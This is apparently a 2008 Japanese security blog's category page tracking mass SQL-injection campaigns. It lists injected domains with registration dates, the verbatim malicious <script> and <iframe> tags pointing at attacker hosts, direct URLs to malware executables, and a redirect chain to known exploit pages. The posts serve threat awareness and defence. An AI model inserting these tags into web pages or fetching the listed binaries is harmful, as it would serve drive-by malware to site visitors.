ウイルス

• インジェクション
  12-26.net 2008-05-23
  tongji123.org 2008-05-23
  culhs.com 2008-05-22
  ccves.cn 2008-05-21
  say8.us 2008-05-21
  food00.net 2008-05-20
  pigzd.cn 2008-05-20
  12-13.net 2008-05-19
  kiki02.net 2008-05-19
  xiaobai01.net 2008-05-18
  qunjs.cn 2008-05-17
  tmdgg.cn 2008-05-17
  123690.net 2008-05-16
  qiqigm.com 2008-05-16
  qiuxuegm.com 2008-05-16
  woai117.cn 2008-05-16
  117275.cn 2008-05-15
  nihao112.com 2008-05-15
  nihaoel3.com 2008-05-15
  jt08.com 2008-05-14
  dota11.cn 2008-05-13
  killpp.cn 2008-05-13
  qiqi111.cn 2008-05-13
  wow112.cn 2008-05-13
  111nv.cn 2008-05-12
  33-25.net 2008-05-12
  godaand.cn 2008-05-12
  see9.us 2008-05-09
  ka47.us 2008-05-06
  kaobt.cn 2008-05-05
  firestnamestea.cn 2008-04-23
  hoursebuilds.cn 2008-04-23
  loveuswarters.cn 2008-04-23
  teachersgood.cn 2008-04-23
  a188.ws 2008-04-12
  5252.ws 2008-04-12
  aidushu.net 2008-03-25
  52gol.com 2008-02-11

  >>
  PR
  • ウイルス
  • 2008/05/16 22:24
  • 0
• インジェクション
  IPA SQLインジェクション攻撃に関する注意喚起 (2008年05月15日)。
  
  インジェクションされるドメインとドメイン登録日を並べてみました(長いので追記に)。
  古いドメインが再利用されることもあるので古ければ安心というわけではありません。
  注入されるタグは一昔前はiframeでしたが、現在はscriptばかりになっています。
  バイナリ置き場は別なドメインだったりしますが省略します。
  
  オンラインゲーム、特にWorld of Warcraftに似たドメインが急増しています。
  WoWは日本語版が無いため日本ではあまり遊ばれていませんが、
  世界のMMORPG市場では圧倒的なシェアを誇ります(参考:MMOGCHART)。
  RMT業者にとっても魅力的な市場なのでしょう。

  >>
  • ウイルス
  • 2008/05/15 16:49
  • 0
• インジェクション
  追記の山になってしまった先週の記事のまとめです。
  インジェクション
  

  <iframe src="http://www.pkck.cn/web.htm"></iframe>

  <script src="http://bbs.jueduizuan.com/ip.js"></script>

  <script src="http://www.ririwow.cn/ip.js"></script>

  <script src="http://www.kisswow.com.cn/m.js"></script>

  <script src="http://www.11910.net/1.js"></script>

  <script src="http://computershello.cn/1.js"></script> (2 5もある)

  <script src="http://winzipices.cn/1.js"></script> (2 3 4 5もある)

  (略)
  バイナリ
  

  http://www.pkck.cn/system.exe

  http://dj.jueduizuan.com/ri.exe

  http://www.bluell.cn/ri.exe

  http://winzipices.cn/1.exe

  http://61.188.38.158/images/test.exe

  
  そして今回の新顔がこちらです。
  インジェクション
  

  <script src="http://www.adword71.com/b.js"></script>

  <script src="http://www.caocaowow.cn/ip.js"></script>

  <script src="http://www.direct84.com/7.js"></script>

  <script src="http://www.killwow1.cn/g.js"></script>

  <script src="http://www.wow112.cn/m.js"></script>

  <script src="http://www.wowgm1.cn/m.js"></script>

  <script src="http://www.wowgm2.cn/m.js"></script>

  <script src="http://www.wowyeye.cn/m.js"></script>

  <script src="http://9i5t.cn/a.js"></script>

  <script src="http://a188.ws/1.js"></script>

  >>
  • ウイルス
  • 2008/05/14 02:54
  • 0
• インジェクション
  <script src="http://free.hostpinoy.info/f.js"></script>
  <script src="http://xprmn4u.info/f.js"></script>
  こちらはオンラインゲームのアカウントハックを目的とする中国製トロイとは異なり
  アダルトサイトやフィッシングサイトへの誘導を目的とするZlob系のインジェクション。
  Google先生に尋ねるとものすごい数のサイトがやられています。
  スクリプトは http://porn-look.net/ というアメリカのアダルトサイトに辿り着きます。

  >>
  • ウイルス
  • 2008/05/12 18:03
  • 0
• インジェクション
  WindowsVistaSP1に続き、WindowsXPSP3がリリースされました。早めに適用しておきましょう。
  リリース記念というわけではありませんが、不定期連載のインジェクション。
  
  IBM ISS SOCレポート2008年04月28日。
  

  4月28日16:00より、新たに「www.pkck.cn」からの攻撃が確認されており、攻撃の拡散化が懸念されます。

  <iframe src="http://www.pkck.cn/web.htm"></iframe>
  web.htm
  →mm.htm
  　→wz.htm (ダミー)
  　→wu.htm
  　　→いつものCuteQQ群
  　　　(Ms06014.htm Ms06067.htm Ms07004.htm Ms07033.htm Ms07055.htm
  　　　 Ajax.htm Bfyy.htm Lz.htm Pps.htm Real.htm XunLei.htm)
  Google先生に尋ねてみたところ、この攻撃はあまり成功していないようです。
  
  また、以前に書いたnihaorr1の続報ですが、UN(国連)のサイトにまで注入されていたようです。
  実行ファイルが変更され、合わせてスクリプトも変更されています。
  下記ドメイン群(もっとあるかも)に設置されているスクリプトも呼び出します。
  baoma999.com benchi999.com buhaoyishi.com haoliuliang.net haowangma.com tianxiayouzei.com zuiyige.com
  
  さらに、新顔を2つ。

  >>
  • ウイルス
  • 2008/05/07 19:51
  • 0